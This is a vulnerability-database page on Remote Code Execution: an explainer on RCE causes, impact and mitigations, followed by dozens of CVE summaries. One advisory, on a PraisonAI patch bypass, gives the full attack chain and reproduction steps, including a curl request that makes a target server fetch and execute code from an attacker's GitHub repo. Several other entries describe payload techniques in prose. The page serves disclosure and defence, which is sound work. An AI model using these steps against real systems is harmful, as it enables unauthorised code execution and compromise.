Remote Code Execution
Remote Code Execution represents the critical moment when an attacker successfully runs arbitrary code on a target system without physical access.
How It Works
Remote Code Execution represents the critical moment when an attacker successfully runs arbitrary code on a target system without physical access. Unlike a single vulnerability class, RCE is an outcome—the catastrophic result of exploiting underlying weaknesses in how applications process input, manage memory, or handle executable content.
Attackers typically achieve RCE by chaining vulnerabilities or exploiting a single critical flaw. Common pathways include injecting malicious payloads through deserialization flaws (where untrusted data becomes executable objects), command injection (where user input flows into system commands), buffer overflows (overwriting memory to hijack execution flow), or unsafe file uploads (placing executable code on the server). Server-Side Template Injection and SQL injection can also escalate to code execution when attackers leverage database or template engine features.
The attack flow usually begins with reconnaissance to identify vulnerable endpoints, followed by crafting a payload that exploits the specific weakness, then executing commands to establish persistence or pivot deeper into the network. Modern exploits often use multi-stage payloads—initial lightweight code that downloads and executes more sophisticated tooling.
Impact
- Complete system compromise — attacker gains shell access with application privileges, potentially escalating to root/SYSTEM
- Data exfiltration — unrestricted access to databases, configuration files, credentials, and sensitive business data
- Lateral movement — compromised server becomes a beachhead to attack internal networks and other systems
- Ransomware deployment — direct pathway to encrypt files and disable backups
- Persistence mechanisms — installation of backdoors, web shells, and rootkits for long-term access
- Supply chain attacks — modification of application code or dependencies to compromise downstream users
Real-World Examples
The n8n workflow automation platform (CVE-2024-21858) demonstrated how RCE can emerge in unexpected places-attackers exploited unsafe workflow execution to run arbitrary code on self-hosted instances. The Log4j vulnerability (Log4Shell) showed RCE at massive scale when attackers sent specially crafted JNDI lookup strings that triggered remote class loading in Java applications worldwide.
Atlassian Confluence instances have faced multiple RCE vulnerabilities through OGNL injection flaws, where attackers inject Object-Graph Navigation Language expressions that execute with server privileges. These required no authentication, enabling attackers to compromise thousands of internet-exposed instances within hours of disclosure.
Mitigation
- Input validation and sanitization — strict allowlists for all user-controlled data, especially in execution contexts
- Sandboxing and containerization — isolate application processes with minimal privileges using containers, VMs, or security contexts
- Disable dangerous functions — remove or restrict features like code evaluation, system command execution, and dynamic deserialization
- Network segmentation — limit blast radius by isolating sensitive systems and restricting outbound connections
- Web Application Firewalls — detect and block common RCE patterns in HTTP traffic
- Runtime application self-protection (RASP) — monitor application behavior for execution anomalies
- Regular patching — prioritize updates for components with known RCE vulnerabilities
Recent CVEs (31887)
Unauthenticated remote code execution in Gotenberg 8.29.1 allows network attackers to execute arbitrary OS commands via newline injection in PDF metadata keys. The `/forms/pdfengines/metadata/write` endpoint passes user-controlled JSON metadata keys directly to ExifTool without control-character validation. Embedding `\n` in a key splits ExifTool's stdin stream, injecting arbitrary flags including `-if` which evaluates Perl expressions. Attack returns HTTP 200 with valid PDF output, evading basic monitoring. CVSS 9.8 (AV:N/AC:L/PR:N/UI:N) reflects critical network-accessible RCE. No vendor-released patch identified at time of analysis — GitHub advisory GHSA-rqgh-gxv4-6657 confirms the issue but CPE data shows no fixed version. Publicly available exploit code exists in Python and bash with OOB exfiltration. Default Docker image `gotenberg/gotenberg:8` runs the vulnerable process as uid 1001 with root group membership, amplifying post-exploitation impact.
HTTP request smuggling in Netty's HttpRequestDecoder allows remote unauthenticated attackers to inject arbitrary HTTP requests by sending malformed Transfer-Encoding headers (specifically 'Transfer-Encoding: chunked, identity'). When Netty is deployed behind a proxy that forwards such requests without rejection, an attacker can smuggle a second request inside the body of the first, bypassing security controls and accessing unintended resources. The vulnerability is confirmed by public proof-of-concept code demonstrating successful parsing of injected requests.
HTTP request smuggling in Netty's chunk size parser allows remote unauthenticated attackers to inject arbitrary HTTP requests by exploiting integer overflow in the hexadecimal chunk size parsing logic. The HttpObjectDecoder.getChunkSize method accumulates the chunk size without proper overflow validation, enabling an attacker to craft a malicious chunk size header that wraps around to a valid size, causing Netty to misinterpret the request boundary and parse injected requests as separate legitimate requests. Publicly available proof-of-concept demonstrates successful parsing of an injected GET request within a chunked POST body, with CVSS score 6.5 (network-accessible, low complexity, no authentication required).
Path traversal via symlink prefix reuse in gitoxide's gix-fs crate allows arbitrary code execution when cloning malicious repositories. Attackers can construct Git trees with duplicate symlink/directory entries that escape the worktree during checkout, writing controlled files to sensitive locations like .git/hooks or ~/.local/bin on Unix systems. Publicly available exploit code exists (PoC script provided in advisory). CVSS 7.8 reflects local attack vector with required user interaction (cloning the malicious repo), but real-world impact is high given code execution potential.
Remote unauthenticated attackers can execute arbitrary code in Snipe-IT versions 8.4.0 and earlier by uploading malicious files through the API's UploadedFilesController component. The vulnerability stems from an authorization bypass where file upload endpoints required only 'view' permission instead of 'update' permission, allowing attackers to upload and execute code without proper authentication. Fixed in commit 676a9958 (March 10, 2026). EPSS data not available. No CISA KEV listing identified at time of analysis. Public exploit code (POC) status unknown, though GitHub security advisory GHSA-xg82-2hrv-hf64 confirms the flaw.
Remote code execution in CODEASTRO Membership Management System v1.0 allows unauthenticated attackers to upload and execute arbitrary files via the /add_members.php endpoint due to improper file sanitization. The vulnerability enables confidentiality and integrity compromise with CVSS 6.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N), indicating network-accessible exploitation with no authentication or user interaction required. Public exploit code is available on GitHub.
ChestnutCMS v1.5.10 has a SQL injection vulnerability. The content parameter of the cms_content tag can be manipulated in the admin backend and injected into a SQL query when the template is rendered.
NPM package next-npm-version1.0.1 is vulnerable to Command injection.
## TL;DR CVE-2026-40287's fix gated `tools.py` auto-import behind `PRAISONAI_ALLOW_LOCAL_TOOLS=true` in **two** files (`tool_resolver.py`, `api/call.py`). A **third** import sink in `praisonai/templates/tool_override.py` was missed and remains unguarded. It is reached by the recipe runner on every recipe execution and is **remotely** triggerable through `POST /v1/recipes/run` with a `recipe` value pointing at any local absolute path *or* any GitHub repo (because `SecurityConfig.allow_any_github` defaults to `True`). The attacker drops a `tools.py` next to `TEMPLATE.yaml`; the server `exec_module()`s it. No auth required by default, no environment opt-in required. ## Patch coverage gap CVE-2026-40287 was fixed in v4.5.139 by adding an env-var gate at: | File | Line | Gate | |---|---|---| | `praisonai/tool_resolver.py` | 77 | `if os.environ.get("PRAISONAI_ALLOW_LOCAL_TOOLS", "").lower() != "true":` | | `praisonai/api/call.py` | 80 | same | But the equivalent sinks in `praisonai/templates/tool_override.py` were **not** patched: ```python # tool_override.py - create_tool_registry_with_overrides() 332 cwd_tools_py = Path.cwd() / "tools.py" 333 if cwd_tools_py.exists(): 334 try: 335 tools = loader.load_from_file(str(cwd_tools_py)) # <-- exec_module 336 registry.update(tools) 337 except Exception: 338 pass 339 341 # 4. Template-local tools.py 342 if template_dir: 343 tools_py = Path(template_dir) / "tools.py" 344 if tools_py.exists(): 345 try: 346 tools = loader.load_from_file(str(tools_py)) # <-- exec_module 347 registry.update(tools) 348 except Exception: 349 pass ``` `load_from_file` (line 84-94) ends in `spec.loader.exec_module(module)` with no allowlist, no signature check, no env gate. Both call sites run unconditionally on every recipe execution. ## Attack chain ``` HTTP POST /v1/recipes/run body: {"recipe": "<abs path>" | "github:<owner>/<repo>/<recipe>"} │ ▼ recipe/serve.py:483 run_recipe(request) ← auth=none default │ ▼ recipe/core.py:215 recipe.run(name, ...) │ ▼ recipe/core.py:686 _load_recipe(name) └─ ".." check only; absolute paths and URIs allowed │ ▼ templates/loader.py:94 TemplateLoader.load(uri) │ ▼ templates/security.py:130 is_source_allowed("github:*") └─ allow_any_github=True default → returns True │ ▼ templates/registry.py fetch repo from raw.githubusercontent.com → cache dir │ ▼ templates/security.py:215 validate_template_directory(cached.path) └─ .py is in allowed_extensions → tools.py kept │ ▼ recipe/core.py:887 _execute_recipe(recipe_config, ...) │ ▼ recipe/core.py:943 create_tool_registry_with_overrides( include_defaults=True, template_dir=recipe_config.path) │ ▼ templates/tool_override.py:341-349 load_from_file(template_dir/tools.py) │ ▼ templates/tool_override.py:94 spec.loader.exec_module(module) ← RCE ``` The tool registry build runs *before* any LLM/agent step, so `OPENAI_API_KEY` and similar are not required. A recipe with an empty `workflow.steps: []` is sufficient - the payload fires during registry construction. ## Confirmed execution (2026-04-25, praisonai 4.6.31) ``` SERVER stdout (PID 43784): Uvicorn running on http://127.0.0.1:8765 127.0.0.1 - POST /v1/recipes/run HTTP/1.1 [CVE-2026-40287-bypass] RCE fired. Marker written to: …/praisonai_pwn_1777094071.txt 127.0.0.1 - "POST /v1/recipes/run" 500 Internal Server Error Marker file: pid: 43784 ← matches server PID argv: ['server.py'] ← server process, not exploit ``` The 500 response is a downstream side-effect of `workflow.steps: []` failing to construct a runnable workflow; the `exec_module(tools.py)` call runs *before* that error. The attacker payload has already executed in the server process by the time the 500 is sent. ## Reproduction (local-path variant) Files under `pocs/praisonai-cve-2026-40287-bypass/`: - [evil_recipe/TEMPLATE.yaml](https://github.com/user-attachments/files/27079207/TEMPLATE.yaml) - minimal recipe metadata - [evil_recipe/tools.py](https://github.com/user-attachments/files/27079210/tools.py) - payload (writes a marker file in tempdir) - [server.py](https://github.com/user-attachments/files/27079211/server.py) - starts `praisonai.recipe.serve.create_app({})` on `127.0.0.1:8765` (default `auth: none`) - [exploit.py](https://github.com/user-attachments/files/27079214/exploit.py) - single POST to `/v1/recipes/run` ```bash pip install 'praisonai[serve]==4.6.31' # Terminal 1 python server.py # Terminal 2 python exploit.py ``` Expected: server stdout shows `[CVE-2026-40287-bypass] RCE fired.`; a `praisonai_pwn_<timestamp>.txt` file appears in the system temp directory containing user, host, pid, cwd captured from inside the server process. ## Reproduction (remote GitHub variant) ```bash # Push evil_recipe/ to https://github.com/<you>/poc-recipe (public repo) curl -X POST http://target:8765/v1/recipes/run \ -H 'Content-Type: application/json' \ -d '{"recipe":"github:<you>/poc-recipe/poc-recipe"}' ``` No filesystem prerequisite on the target. Triggers because `SecurityConfig.allow_any_github` (templates/security.py:30) defaults to `True`.
Arbitrary code execution via Git hook redirection in GitPython 3.1.48 and earlier allows local authenticated users to inject malicious core.hooksPath configuration through newline characters in config_writer().set_value(). Publicly available exploit code exists. The vulnerability enables persistent repository poisoning where attacker-controlled hooks execute with the privileges of any user performing Git operations (commit, merge, checkout) on the poisoned repository. Particularly dangerous in multi-tenant environments like MLRun, DVC, MLflow, or Kedro where shared repositories enable privilege escalation across user contexts. Fixed in GitPython 3.1.49.
DNS rebinding in rmcp Rust crate allows malicious websites to control local MCP servers and achieve arbitrary code execution through exposed developer tools. Fixed in version 1.4.0 via Host header validation with loopback-only default allowlist. The vulnerability affects Streamable HTTP server transport only (stdio and child-process transports unaffected). Vendor-released patch available (PR #764, commit 8e22aa2). Similar vulnerabilities patched across TypeScript, Python, Go, and Java MCP SDKs indicate coordinated disclosure. CVSS 8.8 (network vector, low complexity, requires user interaction) reflects browser-mediated attack requiring victim to visit attacker site.
JupyterLab's CommandLinker executes arbitrary commands via single-click social engineering when users open malicious notebooks shared through email, GitHub, or Binder links. Attackers embed deceptive HTML buttons with allowlisted data-commandlinker-* attributes in pre-saved notebook output cells to trigger commands without code execution submission, enabling immediate arbitrary code execution in available kernels, silent file deletion, or resource exhaustion in multi-tenant deployments. The patched version 4.5.7 was released by the JupyterLab team through GitHub advisory GHSA-mqcg-5x36-vfcg. Chromium browser users face expanded terminal access risk through multi-click clipboard permission abuse. Third-party JupyterLab extensions increase attack surface by exposing additional commands to exploitation.
Spring Expression Language injection in Valtimo (open-source business process platform) allows authenticated ADMIN users to execute arbitrary OS commands and exfiltrate credentials. The vulnerability exists in DocumentMigrationService (versions 12.0.0-12.31.0 and 13.0.0-13.22.0) and the Condition framework (13.4.0-13.22.0), both of which use StandardEvaluationContext to evaluate user-supplied SpEL expressions without restrictions. Attackers can invoke Runtime.exec(), access environment variables containing database passwords and API keys, and load arbitrary Java classes. Vendor-released patches are available (12.32.0, 13.23.0). No public exploit identified at time of analysis, EPSS data not available.
Privilege escalation in Grav CMS 2.0.0-beta.2 allows authenticated API users with minimal media.write permissions to fabricate super-admin accounts via arbitrary YAML file upload. The /api/v1/blueprint-upload endpoint accepts attacker-controlled destination and scope parameters that, when combined with specific values (destination=self@: and scope=users/anything), write files directly into user/accounts/. Because Grav parses YAML files in this directory as authoritative user accounts and accepts plaintext passwords on first login, attackers craft a new account with api.super privileges, then authenticate as that account to gain full administrative control. Publicly available exploit code exists (detailed PoC in vendor advisory). Vendor-released patch restricts accounts directory uploads to image-only extensions and blocks config-bearing file types (YAML, JSON, Twig) across all blueprint-upload targets.
Remote code execution in Scramble API documentation generator versions 0.13.2 through 0.13.21 allows unauthenticated attackers to execute arbitrary PHP code when documentation endpoints are publicly accessible and validation rules reference user-controlled input. Fixed in version 0.13.22. The CVSS score of 9.4 (Critical) reflects the network-accessible, low-complexity attack requiring no authentication, though exploitation requires specific configuration where documentation endpoints remain enabled and validation rules incorporate request-supplied data. No active exploitation (CISA KEV) or public POC identified at time of analysis, but the GitHub security advisory provides full technical details enabling reproduction.
Remote code execution in Palo Alto Networks PAN-OS User-ID Authentication Portal (Captive Portal) allows unauthenticated attackers to execute arbitrary code with root privileges on PA-Series and VM-Series firewalls via specially crafted packets. CISA KEV confirms active exploitation in the wild with publicly available exploit code. EPSS risk assessment is not provided, but the vulnerability achieves maximum impact with minimal attack complexity (CVSS 9.3, AV:N/AC:L/PR:N), making this a critical priority for immediate remediation. The attack surface is significantly reduced when access to the portal is restricted to trusted internal networks per vendor best practices.
Man-in-the-middle attacks can intercept LDAP credentials in Lemur when LDAP TLS is enabled because the authentication module globally disables TLS certificate verification using `ldap.OPT_X_TLS_NEVER`. Attackers positioned between Lemur and the LDAP server can capture plaintext usernames and passwords, modify LDAP group responses to grant admin access, and compromise the entire PKI infrastructure managed by Lemur. The vulnerability affects Lemur versions before 1.9.0 and is confirmed fixed in version 1.9.0.
Remote code execution in Vvveb CMS versions before 1.0.8.2 allows authenticated users with media-upload permissions to execute arbitrary PHP code with web server privileges via a two-stage attack: uploading a malicious .htaccess file to map .phtml extensions to the PHP handler, then uploading a .phtml file containing PHP code. Exploitation requires only low-privileged authentication (CVSS PR:L) and no user interaction (UI:N), making post-authentication compromise straightforward. Vendor-released patch available in version 1.0.8.2 per GitHub security advisory GHSA-wwmv-4g9g-p48g and commit 54a9e846. VulnCheck advisory provides detailed technical analysis of the bypass technique.
Remote code execution in Vvveb CMS versions before 1.0.8.2 enables low-privilege authenticated users (editor, author, contributor, or site_admin roles) to escalate privileges and execute arbitrary PHP code. Attackers exploit the admin code editor's insufficient file extension validation by first uploading a malicious .htaccess file that maps arbitrary extensions to the PHP handler, then uploading PHP code disguised with that extension. Once uploaded, the PHP code executes with web server privileges when accessed via HTTP, effectively bypassing authentication and achieving full system compromise. The vulnerability requires only low-privilege access (PR:L) with no attack complexity or user interaction (AC:L/UI:N), and vendor-released patch version 1.0.8.2 is confirmed available via GitHub. No public exploit code or active exploitation (KEV) confirmed at time of analysis.
Script injection in UI in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who convinced a user to engage in specific UI gestures to inject arbitrary scripts or HTML (UXSS) via a crafted HTML page. (Chromium security severity: Low)
Remote code execution within Chrome's sandbox allows arbitrary code execution via a malicious HTML page exploiting a use-after-free vulnerability in WebRTC. Affects Chrome versions prior to 148.0.7778.96. Despite high CVSS 8.8 scoring and RCE capability, exploitation requires user interaction (visiting a crafted page) and is confined to Chrome's sandbox, limiting system-level impact. Vendor patch released in Chrome 148.0.7778.96. No evidence of active exploitation (not in CISA KEV) or public POC at time of analysis, though Chromium security team rated this as Low severity internally, suggesting limited real-world exploitability despite the technical impact.
Remote code execution in Google Chrome on macOS versions prior to 148.0.7778.96 enables attackers to execute arbitrary code within the browser's sandbox through a malicious HTML page exploiting a use-after-free vulnerability in the Audio subsystem. The vulnerability requires user interaction (visiting a crafted webpage) but no authentication, with CVSS 8.8 rating reflecting high impact across confidentiality, integrity, and availability. Google has released patches in Chrome 148.0.7778.96; no active exploitation (KEV) or public POC has been identified at time of analysis, though the technical details are publicly accessible via Chromium issue tracker 495779613.
Remote code execution affects ChromeDriver in Google Chrome versions prior to 148.0.7778.96 on Windows platforms. Exploitation requires user interaction with a malicious HTML page, enabling remote attackers to achieve arbitrary code execution with high impact to confidentiality, integrity, and availability. Vendor-released patch available (version 148.0.7778.96). No active exploitation confirmed in CISA KEV at time of analysis, though CVSS base score of 8.8 reflects significant potential impact if users visit attacker-controlled content.
Remote code execution within Chrome's sandbox affects all versions prior to 148.0.7778.96 through an out-of-bounds read vulnerability in the AdFilter component. Attackers can execute arbitrary code by delivering a specially crafted HTML page, requiring only that a user visit the malicious page. Chrome has released version 148.0.7778.96 to address this vulnerability. No evidence of active exploitation (not in CISA KEV) or public proof-of-concept code at time of analysis, though the vulnerability's network-based attack vector and low complexity make it a realistic exploitation target once technical details become public.
Remote code execution in Google Chrome versions prior to 148.0.7778.96 on Linux and ChromeOS allows attackers to execute arbitrary code when users perform specific UI gestures on a malicious webpage. The vulnerability stems from insufficient input validation in Chrome's UI layer (CWE-20). Vendor patch available in Chrome 148.0.7778.96. No public exploit identified at time of analysis, though CVSS 8.8 reflects high impact across confidentiality, integrity, and availability.
Remote code execution in Google Chrome prior to 148.0.7778.96 through a use-after-free vulnerability in the UI component. Attackers who have already compromised the renderer process can escape sandbox restrictions and execute arbitrary code by delivering a specially crafted HTML page requiring user interaction. Google has released patch version 148.0.7778.96. No active exploitation confirmed in CISA KEV at time of analysis, though the vulnerability requires prior renderer compromise which increases attack complexity beyond the CVSS AC:L rating suggests.
Remote code execution in Google Chrome's WebRTC implementation (versions prior to 148.0.7778.96) allows attackers to execute arbitrary code within the browser sandbox through a malicious HTML page exploiting type confusion in WebRTC. Patch available via Chrome 148.0.7778.96. Requires user interaction (visiting crafted page) but no authentication. CVSS 8.8 reflects high impact across confidentiality, integrity, and availability within sandbox constraints. No confirmed active exploitation or public POC identified at time of analysis.
Remote code execution in Google Chrome's WebRTC component (versions prior to 148.0.7778.96) allows attackers to execute arbitrary code within the browser's sandbox by exploiting a use-after-free memory corruption vulnerability via a malicious HTML page. While sandboxed, successful exploitation achieves high confidentiality, integrity, and availability impact within the renderer process. EPSS data unavailable; not listed in CISA KEV, indicating no confirmed widespread exploitation at time of analysis. Vendor patch released as Chrome 148.0.7778.96.
Remote code execution in Google Chrome's ReadingMode component (versions prior to 148.0.7778.96) allows attackers who have already compromised the renderer process to escape sandbox restrictions and execute arbitrary code on the underlying system. The vulnerability requires user interaction to visit a malicious webpage but exploitation complexity is low once renderer compromise is achieved. EPSS data not available; no CISA KEV listing identified at time of analysis, indicating no confirmed widespread exploitation. Vendor-released patch available in Chrome 148.0.7778.96.
Remote code execution in Google Chrome's WebAudio implementation (versions before 148.0.7778.96) allows attackers to execute arbitrary code within the browser sandbox by exploiting a use-after-free vulnerability through a malicious HTML page. The vulnerability requires user interaction (visiting a crafted page) but no authentication. Google has released Chrome 148.0.7778.96 to address this issue. EPSS data not available; no KEV listing or public POC identified at time of analysis, suggesting limited real-world exploitation observed despite the high CVSS score.
Remote code execution in Google Chrome versions prior to 148.0.7778.96 via malicious extension exploitation of use-after-free in Views component. Successful exploitation requires convincing a user to install a crafted Chrome extension, after which the attacker can execute arbitrary code with Chrome's privileges. Google has released Chrome 148.0.7778.96 to address this vulnerability. No evidence of active exploitation (not listed in CISA KEV) or public proof-of-concept code identified at time of analysis. CVSS 7.5 severity driven by high attack complexity and required user interaction, which moderates real-world exploitation risk despite potential for full system compromise.
Remote code execution in Google Chrome versions prior to 148.0.7778.96 allows attackers to execute arbitrary code within the browser's sandbox by exploiting a use-after-free vulnerability in the Blink rendering engine through a specially crafted HTML page. CVSS score of 8.8 reflects high impact across confidentiality, integrity, and availability, though exploitation requires user interaction (visiting a malicious webpage). EPSS data not available. Not listed in CISA KEV at time of analysis. Vendor-released patch available in Chrome 148.0.7778.96.
Remote code execution in Google Chrome's Media component on macOS and iOS versions prior to 148.0.7778.96 allows attackers to execute arbitrary code within the browser sandbox by exploiting an out-of-bounds write vulnerability. Attack requires the compromised renderer process prerequisite plus user interaction with a malicious HTML page. CVSS rates this 8.8 (High) due to network attack vector and no authentication required, though exploitation remains constrained by the sandbox boundary and requires initial renderer compromise. Vendor-released patch available in Chrome 148.0.7778.96. No active exploitation (CISA KEV) or public exploit code identified at time of analysis.
Remote code execution within Chrome's sandbox affects all versions prior to 148.0.7778.96 through an out-of-bounds write in the WebRTC component. Attackers can achieve arbitrary code execution by convincing users to visit a specially crafted HTML page, though execution remains confined to Chrome's sandbox. EPSS data not available for this recent CVE (May 2026). Vendor-released patch version 148.0.7778.96 addresses the vulnerability with Chromium security severity rated Medium despite 8.8 CVSS score.
Use-after-free in Chrome's V8 JavaScript engine enables remote code execution inside the sandbox when users install a malicious extension. Google Chrome versions prior to 148.0.7778.96 are vulnerable to arbitrary code execution through specially crafted Chrome Extensions exploiting memory corruption in V8. CVSS rates this 8.8 (High) with network attack vector requiring user interaction. Vendor-released patch available in Chrome 148.0.7778.96 per Google's May 2026 stable channel update. EPSS and KEV data not provided; exploitation requires social engineering to install malicious extension, limiting automated exploitation scenarios.
Remote code execution in Google Chrome before 148.0.7778.96 allows unauthenticated attackers to execute arbitrary code within the Chrome sandbox by exploiting a use-after-free vulnerability in the CSS rendering engine through a malicious webpage. Requires victim interaction (visiting attacker-controlled page) but needs no authentication. Vendor-released patch available as Chrome 148.0.7778.96. EPSS score not provided; no CISA KEV listing indicates no confirmed widespread exploitation at time of analysis, though browser vulnerabilities are high-value targets.
Remote code execution in Google Chrome's MediaRecording component (versions prior to 148.0.7778.96) allows attackers to execute arbitrary code when victims perform specific UI interactions with a malicious webpage. The use-after-free vulnerability in memory management has been patched by Google in version 148.0.7778.96. EPSS data not available; no CISA KEV listing identified, suggesting no confirmed widespread exploitation at time of analysis, though publicly available exploit code exists per Chromium bug tracker disclosure.
Remote code execution in Google Chrome for Windows below version 148.0.7778.96 allows unauthenticated attackers to execute arbitrary code within Chrome's sandbox via specially crafted HTML pages exploiting a use-after-free vulnerability in the WebRTC implementation. CVSS score of 8.8 reflects high impact across confidentiality, integrity, and availability. EPSS data not provided, but Google's 'High' severity classification and immediate patch release indicate active concern. No CISA KEV listing or public POC identified at time of analysis, though the vulnerability is already patched.
Remote code execution in Google Chrome versions prior to 148.0.7778.96 occurs when attackers exploit a type confusion vulnerability in the JavaScript runtime through malicious web pages. The vulnerability requires only that users visit a crafted HTML page, making it highly accessible for social engineering attacks. No active exploitation confirmed by CISA KEV at time of analysis, though Google has released patches addressing this high-severity memory corruption flaw with confirmed public disclosure through Chromium issue tracker.
Remote code execution in Google Chrome prior to version 148.0.7778.96 allows attackers to execute arbitrary code within the browser's sandbox by exploiting a use-after-free vulnerability in the Presentation API through a specially crafted HTML page. User interaction is required (visiting a malicious webpage). EPSS data not available for this recent CVE. No public exploit confirmed at time of analysis, though the vulnerability has been patched by Google in the stable channel release.
Remote code execution in Google Chrome prior to 148.0.7778.96 enables attackers to execute arbitrary code by exploiting a use-after-free vulnerability in the Passwords component through a malicious HTML page. User interaction (visiting the crafted page) is required. CVSS score of 8.8 reflects network-based attack requiring no authentication but requiring user interaction, with high impact to confidentiality, integrity, and availability. Vendor patch available in Chrome 148.0.7778.96. No public exploitation confirmed at time of analysis.
Remote code execution within Chrome's sandbox affects all versions prior to 148.0.7778.96 via crafted HTML pages exploiting a use-after-free vulnerability in DOM handling. Remote unauthenticated attackers can achieve arbitrary code execution with high integrity and confidentiality impact by convincing users to visit a malicious webpage. Vendor patch released (Chrome 148.0.7778.96). No confirmed active exploitation (not in CISA KEV), but the low attack complexity (AC:L) and publicly disclosed bug tracker entry (Chromium issue 496292089) increase exploitation risk. EPSS data not provided but RCE in widely-deployed browser warrants immediate patching despite sandbox containment limiting full system compromise.
Remote code execution in Google Chrome versions prior to 148.0.7778.96 allows attackers to execute arbitrary code within the browser's sandbox through a use-after-free vulnerability in SVG rendering. User interaction (visiting a malicious webpage) is required, but no authentication is needed. Vendor-released patch available in Chrome 148.0.7778.96. No public exploit identified at time of analysis, though CVSS score of 8.8 reflects high impact if successfully exploited.
Remote code execution within Chrome's V8 sandbox affects all versions prior to 148.0.7778.96 when users visit malicious web pages. The out-of-bounds memory access vulnerability in V8 JavaScript engine enables arbitrary code execution with user interaction (visiting crafted HTML), rated high severity by Chromium team. EPSS and KEV data not available, but Google confirmed the vulnerability and released patches. Attack complexity is low (CVSS AC:L) with no authentication required, making this exploitable at scale once proof-of-concept becomes public.
Remote code execution in Google Chrome for macOS (versions prior to 148.0.7778.96) allows attackers to execute arbitrary code within the browser's sandbox by exploiting a use-after-free vulnerability in the ANGLE graphics library through a malicious HTML page. The vulnerability requires user interaction (visiting a crafted webpage) but can be exploited remotely without authentication. Google has released Chrome 148.0.7778.96 to address this high-severity memory corruption issue, which affects the confidentiality, integrity, and availability of sandboxed browser processes.
Out-of-bounds memory access in Chrome's V8 JavaScript engine enables remote code execution within the browser sandbox when users visit malicious websites. Affects all Chrome versions prior to 148.0.7778.96 across Windows, macOS, and Linux. Google released patches in the stable channel update (build 148.0.7778.96) per May 2026 advisory. No active exploitation confirmed at time of analysis, but CVSS 8.8 indicates high severity and the vulnerability requires only user interaction (visiting a crafted webpage) with no authentication needed.
Remote code execution in Google Chrome's Chromoting component (remote desktop feature) on Linux allows unauthenticated attackers to execute arbitrary code through specially crafted network packets when a user interacts with a malicious remote desktop session. Fixed in Chrome 148.0.7778.96. Vendor rates severity as Critical. No public exploit code identified at time of analysis, but the use-after-free class (CWE-416) is well-understood and exploitable. CVSS 8.8 reflects network attack vector with low complexity requiring only user interaction, enabling full system compromise (high confidentiality, integrity, and availability impact).
Remote code execution in Google Chrome for iOS prior to version 148.0.7778.96 through use-after-free memory corruption in the mobile UI handler. Exploitation requires convincing a user to perform specific UI gestures while viewing a malicious HTML page. Google confirms Critical severity and has released a patched version. EPSS data unavailable; not currently listed in CISA KEV. Attack complexity is rated High due to the required user interaction pattern, limiting opportunistic exploitation but enabling targeted attacks via social engineering.
SQL injection in Rucio's DID search API allows any authenticated user to execute arbitrary SQL against the PostgreSQL metadata database when the postgres_meta plugin is configured. The vulnerability exists in FilterEngine.create_postgres_query where attacker-controlled filter parameters are interpolated directly into raw SQL via Python str.format. Exploitation enables complete database compromise including extraction of authentication tokens, password hashes (SHA-256 single-iteration, GPU-crackable), storage credentials, and session hijacking. Remote code execution is possible via PostgreSQL COPY...FROM PROGRAM if database privileges permit. CVSS 9.9 (Critical) reflects the scope change and cascading impact across confidentiality, integrity, and availability. No public exploit identified at time of analysis, but attack complexity is low (AC:L) requiring only basic authenticated access.
SQL injection in Rucio's DID search API allows any authenticated user to execute arbitrary SQL on Oracle database backends, enabling complete database compromise. The vulnerability affects Rucio versions 1.27.0 through 40.1.0 when deployed with Oracle databases using the default json_meta plugin. Attackers can extract authentication tokens, password hashes (SHA-256 single-iteration, GPU-crackable), storage credentials, and all managed data. Data modification and potential remote code execution via Oracle PL/SQL features are possible. Vendor-confirmed vulnerability with patches released across four version branches. PostgreSQL and MySQL deployments are not affected due to proper SQLAlchemy parameterization on those database dialects.
Remote code execution in Cisco Unity Connection allows authenticated remote attackers with low-privilege credentials to execute arbitrary code as root via crafted API requests to the web management interface. Successful exploitation enables complete device compromise. CVSS score of 8.8 reflects high impact across confidentiality, integrity, and availability, though exploitation requires valid user credentials (PR:L). No public exploit code or active exploitation confirmed at time of analysis. EPSS data not available in provided intelligence.
A denial-of-service vulnerability in the Linux kernel's OpenVPN TCP stream processing (ovpn_tcp_recv) allows remote unauthenticated attackers to cause packet drops and potential system unavailability through header offset overflow and misaligned protocol headers when handling coalesced TCP packets. The vulnerability affects Linux kernel versions containing commit 11851cbd60ea (OpenVPN driver) through 6.19.6, 6.18.16, and 7.0, with patches available in stable branches. EPSS score of 0.02% (4th percentile) suggests low observed exploitation probability despite the network-accessible attack vector and high availability impact (CVSS 7.5).
Local privilege escalation in ZTE PROCESS Guard Service allows authenticated local users to escalate privileges and achieve arbitrary code execution through improper access control enforcement, affecting the cloud computer client. The vulnerability requires local access and authenticated user context but operates across system boundaries, potentially compromising system integrity. No active exploitation has been confirmed at time of analysis, though the combination of privilege escalation and RCE capability makes this a moderate-priority local threat.
Malicious environment variable injection in Oracle Cloud Native Environment Command Line Interface v2.3.2 allows local authenticated users with low privileges to execute arbitrary code through user interaction, compromising systems running the affected CLI tool. The vulnerability requires local access and user action but results in high-impact code execution with full confidentiality and integrity compromise.
Remote code execution in GeoVision GV-ASWeb 6.2.0 allows authenticated users with System Setting permissions to execute arbitrary commands by bypassing frontend restrictions through crafted HTTP POST requests to the ASWebCommon.srf backend endpoint. This authenticated network-accessible vulnerability achieves full system compromise (confidentiality, integrity, and availability impact) with low attack complexity. No public exploit code or active exploitation confirmed at time of analysis, though EPSS data unavailable for risk contextualization.
Stored cross-site scripting in Juzaweb CMS 5.0.0 allows authenticated remote attackers to inject arbitrary JavaScript via the Add Banner Ads function, exploitable with user interaction (page visit). The vulnerability enables credential theft, session hijacking, and defacement of administrative interfaces. A proof-of-concept is publicly available on GitHub, though exploitation requires authenticated access and victim interaction with a malicious payload.
Stored cross-site scripting in Grav CMS allows low-privileged users with page-creation permissions to inject malicious SVG payloads that execute when administrators view the page. The vulnerability stems from regex-based XSS detection that fails to catch unquoted event handlers and omits SVG/MathML from dangerous tags. Exploitation exfiltrates the admin-nonce token from /admin/config/info, enabling CSRF bypass and chained remote code execution through scheduled tasks or plugin endpoints. GitHub advisory GHSA-w8cg-7jcj-4vv2 confirms exploit details; patch available in Grav 2.0.0-beta.2 (commit 5a12f9be8). CVSS 8.9 (High) with network attack vector, low complexity, and scope change reflecting cross-context session hijacking.
